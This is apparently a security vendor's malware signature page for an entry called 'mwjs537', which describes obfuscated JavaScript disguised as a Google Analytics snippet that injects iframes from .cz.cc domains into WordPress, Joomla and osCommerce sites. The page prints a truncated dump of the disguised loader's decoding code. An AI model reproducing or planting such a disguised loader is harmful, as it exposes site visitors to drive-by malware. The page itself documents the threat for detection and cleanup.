SiteCheck Signatures

  1. Home
  2. Signatures
  3. SiteCheck Signatures
  4. malware-entry-mwjs537

malware-entry-mwjs537

Description: Malicious javascript desguised as a Google analytics tracking code, and used to load malware (iframes) from multiple .cz.cc domains (specially from trip11209.cz.cc):

Affecting: Any web site (common on WordPress, Joomla and osCommerce).

Clean up: Our team can clean up it for you: http://sucuri.net/signup/

Malware dump:


<script snc="http://www.google-analytics.com/urchin.js" id="googleanalytics"..

var emob = googleanalytics;var emsk = 126853 * 4;var emsp = googleanalytics.id.substr(1,0);var k .. emob.innerHTML.split(emsk.toString())[1].split(emsp);for(var v in t) { if(v%2 == 0) {var c = parseInt(t[v++]+t[v],8+...